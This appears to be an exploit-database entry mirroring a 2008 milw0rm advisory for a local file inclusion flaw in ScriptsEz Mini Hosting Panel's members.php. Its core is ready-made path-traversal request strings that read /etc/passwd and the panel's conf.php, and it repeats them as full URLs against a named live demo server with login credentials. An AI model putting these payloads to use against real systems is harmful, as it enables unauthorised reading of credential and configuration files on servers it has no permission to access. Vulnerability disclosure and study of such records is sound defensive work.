header-logo
Suggest Exploit
vendor:
Mini Hosting Panel
by:
JosS
6.4
CVSS
MEDIUM
Local File Inclusion
98
CWE
Product Name: Mini Hosting Panel
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

ScriptsEz Mini Hosting Panel (members.php) Local File Inclusion Vulnerability

ScriptsEz Mini Hosting Panel is prone to a local file inclusion vulnerability. An attacker can exploit this issue to view sensitive files from remote locations on the affected computer; this may aid in further attacks. This issue affects members.php. The PoC for this vulnerability is /members.php?act=view&p=[FILE]&dir=[DIR] and the exploits are /etc/passwd/ --> /members.php?act=view&p=passwd&dir=../../../../../../../../../../../../etc/ and conf.php --> /members.php?act=view&p=conf.php&dir=/test/../../..

Mitigation:

The vendor has released a patch to address this issue. Users are advised to upgrade to the latest version.
Source

Exploit-DB raw data:

# ScriptsEz Mini Hosting Panel (members.php) Local File Inclusion Vulnerability
# url: http://www.scriptsez.net/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.

vuln file: members.php

PoC:             /members.php?act=view&p=[FILE]&dir=[DIR]
Exploits: 
/etc/passwd/ --> /members.php?act=view&p=passwd&dir=../../../../../../../../../../../../etc/
conf.php     --> /members.php?act=view&p=conf.php&dir=/test/../../..

live demo:
http://hosting.cgixp.apkafuture.com/index.php?action=login
demo:demo (user login)

http://hosting.cgixp.apkafuture.com/members.php?act=view&p=passwd&dir=../../../../../../../../../../../../etc/
http://hosting.cgixp.apkafuture.com/members.php?act=view&p=conf.php&dir=/test/../../..

Ingenious work :D

# milw0rm.com [2008-10-09]